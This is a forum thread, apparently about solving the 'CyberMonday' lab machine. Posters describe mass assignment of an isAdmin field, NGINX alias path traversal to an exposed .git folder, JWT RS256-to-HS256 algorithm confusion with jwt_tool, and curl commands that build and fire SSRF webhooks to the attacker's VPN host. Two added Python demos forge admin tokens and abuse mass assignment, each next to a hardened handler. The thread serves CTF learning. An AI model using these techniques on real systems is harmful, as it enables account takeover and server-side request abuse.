Aug 20, 2023, 12:05 PM
(This post was last modified: Aug 20, 2023, 12:38 PM by Mandelio. Edit Reason: Fixed phrasing)
So, you can crash the update-profile thing by passing an array to password; from there you can see how it updates the user. It passes the whole array. We know that the user has a key "isAdmin", so we can become admin by also passing "isAdmin=1" in the POST data.
After that we get access to the dashboard, from there we see the changelog.
From the changelog we get a virtual host.
These are all the available methods
{
  "status":"success",
  "message":{
    "routes":{
      "/auth/register":{
        "method":"POST",
        "params":[
          "username",
          "password"
        ]
      },
      "/auth/login":{
        "method":"POST",
        "params":[
          "username",
          "password"
        ]
      },
      "/webhooks":{
        "method":"GET"
      },
      "/webhooks/create":{
        "method":"POST",
        "params":[
          "name",
          "description",
          "action"
        ]
      },
      "/webhooks/delete:uuid":{
        "method":"DELETE"
      },
      "/webhooks/:uuid":{
        "method":"POST",
        "actions":{
          "sendRequest":{
            "params":[
              "url",
              "method"
            ]
          },
          "createLogFile":{
            "params":[
              "log_name",
              "log_content"
            ]
          }
        }
      }
    }
  }
}
If we interact with the API we can register, and it returns an X-Access-Token. It uses the RS256 method to verify the signature.
We can get the JWKS object at /jwks.json
I tried the -X k option of jwt_tool (k = key confusion; specify the public key with -pk). You can get the public key by verifying the signature of the original token: provide -V and -jw as args, and this will generate the public key .pem file. I passed --injectclaims --payloadclaim "role" --payloadvalue "admin" (and, obviously, the generated public key).
However I always get 403.
I tried passing the X-Access-Token both as value and as parameter. Doesn't work. Any ideas?
(Aug 20, 2023, 09:45 AM)redtaperecorder Wrote: (Aug 20, 2023, 02:42 AM)ByteBuster Wrote: There is a .git folder in /assets../.git. Upon examining the content, we can perform a mass assignment.
@if(auth()->user()->isAdmin)
+ <a href="{{ route('dashboard') }}"
to access the dashboard panel.
How did you find /assets..?
When you are looking for NGINX Alias Path Traversal, you first try with assets../, then with assets../../, and so on. When you have added enough ../ you will see that the error code changes from 404 to 400. That's how you can know if you got an NGINX Alias Path Traversal.
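As an added Python example (not code from the thread and not the CyberMonday application, which is PHP), this sketches the two tricks the post above describes: a PHP-style `password[]=x` parameter turning into an array that crashes the password hashing, and an unexpected `isAdmin=1` being written straight to the user because the handler updates the model with the whole request. The `User` model, the handler names, the `php_style_form` parser and the sample query strings are assumptions constructed for the demo; the hardened handler shows the allow-list plus type check that closes both holes.

```python
import hashlib
import os
from urllib.parse import parse_qsl


class User:
    """Hypothetical model; isAdmin is the flag the dashboard template checks."""

    def __init__(self, user_id, username, password_hash, isAdmin=False):
        self.id, self.username, self.password_hash, self.isAdmin = user_id, username, password_hash, isAdmin


def hash_password(password: str) -> str:
    salt = os.urandom(16)
    return salt.hex() + ":" + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()


def php_style_form(query: str) -> dict:
    """Mimic PHP's request parsing (assumption): 'password[]=x' arrives as a list, other keys as scalars."""
    form = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.endswith("[]"):
            form.setdefault(key[:-2], []).append(value)
        else:
            form[key] = value
    return form


def vulnerable_update_profile(user: User, form: dict) -> User:
    """Equivalent of updating the model with the whole request: every submitted key is written."""
    for key, value in form.items():
        if key == "password":
            value = hash_password(value)  # a list here raises; with debug on, the trace exposes this code
        setattr(user, key, value)         # an extra "isAdmin=1" lands here unchallenged
    return user


PROFILE_FIELDS = {"username", "password"}


def hardened_update_profile(user: User, form: dict) -> User:
    """Allow-list the writable fields and validate types before touching the model."""
    unexpected = set(form) - PROFILE_FIELDS
    if unexpected:
        raise ValueError("unexpected fields: " + ", ".join(sorted(unexpected)))
    for key, value in form.items():
        if not isinstance(value, str) or not value:
            raise ValueError(key + " must be a non-empty string")
        setattr(user, key, hash_password(value) if key == "password" else value)
    return user


def demo() -> dict:
    out = {}
    # 1. array in password: the hash call blows up (the crash the post used to read the update code)
    try:
        vulnerable_update_profile(User(2, "guest", hash_password("pw")), php_style_form("password[]=x"))
        out["array_crash"] = None
    except AttributeError as exc:
        out["array_crash"] = type(exc).__name__
    # 2. mass assignment: the same request plus isAdmin=1 promotes the account
    promoted = vulnerable_update_profile(User(2, "guest", hash_password("pw")),
                                         php_style_form("password=newpass&isAdmin=1"))
    out["vulnerable_isAdmin"] = promoted.isAdmin
    # 3. the hardened handler refuses both tricks
    for query in ("password[]=x", "password=newpass&isAdmin=1"):
        try:
            hardened_update_profile(User(2, "guest", hash_password("pw")), php_style_form(query))
            out[query] = "accepted"
        except ValueError as exc:
            out[query] = str(exc)
    return out


if __name__ == "__main__":
    print(demo())
```

Run it directly to see the three outcomes. The detection side is the same in any framework: a profile update that accepts any field name the client sends is the bug, not the specific `isAdmin` key.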
So, anyone got any callback from SSRF?
(Aug 20, 2023, 02:54 PM)ByteBuster Wrote: (Aug 20, 2023, 12:05 PM)Mandelio Wrote: [...]
You need to craft a new JWT token for admin:
{
"id": 1,
"username": "admin",
"role": "admin"
}
and use Algorithm Confusion attacks to switch the alg to HS256:
{
"typ": "JWT",
"alg": "HS256"
}
using:
python3 jwt_tool.py <JWT here> -S hs256 -k kid_0_1692488831.pem
With the new token you can create a new webhook:
curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/create \
-H "x-access-token: Token-Here" \
-H "Content-Type: application/json" \
-d '{"name": "testing", "description": "testing", "action": "sendRequest", "url": "http://your-vpn-here"}'
That creates a new webhook UUID.
With the new UUID you can trigger it with:
curl -X POST http://webhooks-api-beta.cybermonday.htb/webhooks/new-uuid-here \
-H "x-access-token: jwt-here" \
-H "Content-Type: application/json" \
-d '{"action": "sendRequest", "url": "http://your-vpn-to-test", "method": "GET"}'
I got a connection back. But how to get a shell with that?
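As an added Python example (not code from the thread or from the CyberMonday box), this is what the RS256-to-HS256 algorithm confusion quoted above relies on, with both the forgery and the server-side verifier shown. The RSA part is a textbook sign-the-digest toy and the PEM is a simplified encoding (real RS256 is PKCS#1 v1.5 over an SPKI-DER public key), kept only so the block runs offline with the standard library; the function names, claims and the 512-bit key size are assumptions. The line that matters is the vulnerable verifier handing the same public-key bytes to HMAC because the attacker-controlled header said HS256, which is exactly what `jwt_tool.py <JWT> -S hs256 -k <pubkey>.pem` exploits; the hardened verifier pins the algorithm it issued.

```python
import base64
import hashlib
import hmac
import json
import random

# Toy RSA: textbook "sign the SHA-256 digest", NOT PKCS#1 v1.5. Demo only; real keys need a CSPRNG.
def _probable_prime(n, rounds=16):
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _gen_prime(bits):
    while True:
        c = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _probable_prime(c):
            return c

def generate_keypair(bits=512):
    """Returns ((n, e), (n, d)); 512 bits is for demo speed only."""
    e = 65537
    while True:
        p, q = _gen_prime(bits // 2), _gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (p * q, e), (p * q, pow(e, -1, phi))

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def public_key_pem(pub) -> bytes:
    """Simplified PEM (assumption; real files carry SPKI DER). What matters is that these exact
    bytes are what the server loads and what the attacker can rebuild from /jwks.json."""
    body = base64.b64encode(json.dumps({"n": pub[0], "e": pub[1]}).encode()).decode()
    return b"-----BEGIN PUBLIC KEY-----\n" + body.encode() + b"\n-----END PUBLIC KEY-----\n"

def parse_public_key_pem(pem: bytes):
    key = json.loads(base64.b64decode(pem.decode().split("-----")[2].strip()))
    return key["n"], key["e"]

def _digest_int(signing_input: bytes) -> int:
    return int.from_bytes(hashlib.sha256(signing_input).digest(), "big")

def sign(payload: dict, alg: str, key) -> str:
    header = {"typ": "JWT", "alg": alg}
    signing_input = (b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(payload).encode())).encode()
    if alg == "RS256":
        n, d = key
        sig = pow(_digest_int(signing_input), d, n).to_bytes((n.bit_length() + 7) // 8, "big")
    elif alg == "HS256":
        sig = hmac.new(key, signing_input, hashlib.sha256).digest()
    else:
        raise ValueError("unsupported alg")
    return signing_input.decode() + "." + b64url(sig)

def _rs256_ok(signing_input: bytes, sig: bytes, pem: bytes) -> bool:
    n, e = parse_public_key_pem(pem)
    return pow(int.from_bytes(sig, "big"), e, n) == _digest_int(signing_input)

def vulnerable_verify(token: str, key_material: bytes) -> dict:
    """The bug: alg is read from the attacker-controlled header, and the same key_material
    (the public-key PEM) is handed to HMAC when that header says HS256."""
    h, p, s = token.split(".")
    header, signing_input, sig = json.loads(b64url_decode(h)), f"{h}.{p}".encode(), b64url_decode(s)
    if header.get("alg") == "RS256":
        ok = _rs256_ok(signing_input, sig, key_material)
    elif header.get("alg") == "HS256":
        ok = hmac.compare_digest(hmac.new(key_material, signing_input, hashlib.sha256).digest(), sig)
    else:
        ok = False
    if not ok:
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(p))

def hardened_verify(token: str, pub_pem: bytes) -> dict:
    """Fix: the server pins the algorithm it issued; the header's alg is never trusted."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "RS256":
        raise ValueError("invalid signature")
    if not _rs256_ok(f"{h}.{p}".encode(), b64url_decode(s), pub_pem):
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(p))

def forge_hs256(pub_pem: bytes, payload: dict) -> str:
    """What `jwt_tool.py <JWT> -S hs256 -k <pubkey>.pem` does: HS256-sign with the PEM bytes as secret."""
    return sign(payload, "HS256", pub_pem)

def demo() -> dict:
    pub, priv = generate_keypair()
    pem = public_key_pem(pub)  # stands in for the .pem jwt_tool derives from /jwks.json
    legit = sign({"id": 7, "username": "guest", "role": "user"}, "RS256", priv)
    forged = forge_hs256(pem, {"id": 1, "username": "admin", "role": "admin"})
    result = {
        "legit_role": vulnerable_verify(legit, pem)["role"],
        "forged_role_vulnerable": vulnerable_verify(forged, pem)["role"],
        "legit_role_hardened": hardened_verify(legit, pem)["role"],
    }
    try:
        hardened_verify(forged, pem)
        result["forged_rejected_hardened"] = False
    except ValueError:
        result["forged_rejected_hardened"] = True
    return result

if __name__ == "__main__":
    print(demo())
```

Run it directly to print the outcome. Against a real target the HMAC key has to be the exact bytes of the PEM the server loads, which is why the thread's earlier note about jwt_tool's -V -jw export from /jwks.json matters: a different PEM serialisation of the same key produces a different signature and gets rejected.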
Aug 20, 2023, 03:41 PM
(This post was last modified: Aug 20, 2023, 03:56 PM by HerVelizy.)
(Aug 20, 2023, 02:54 PM)ByteBuster Wrote: [...]
python3 jwt_tool.py <JWT here> -S hs256 -k kid_0_1692488831.pem
[...]
Where do you get kid_0_1692488831.pem?
(Aug 20, 2023, 03:34 PM)wiener_peter Wrote: [...]
I got a connection back. But how to get a shell with that?
Couldn't we call Redis? (I'm stuck at the webhook creation for now. It's my first time.)
(Aug 20, 2023, 04:36 PM)M3Y Wrote: How can I get a shell?
idk how to get a shell
(Aug 20, 2023, 06:38 PM)k1ng5h4rk Wrote: (Aug 20, 2023, 02:54 PM)ByteBuster Wrote: [...]
It keeps giving me this error message while creating a new webhook:
{"status":"error","message":"\"name\" not defined"}
Define the Content-Type header: -H 'Content-Type: application/json'
Some help to get a shell or something as user? Webhooks hit my machine, but I have no idea what to do.
(Aug 21, 2023, 05:11 AM)IXNovaticula Wrote: I can't seem to find the jwks.json file that you keep mentioning; the server says that file is not found.
curl "http://webhooks-api-beta.cybermonday.htb/jwks.json"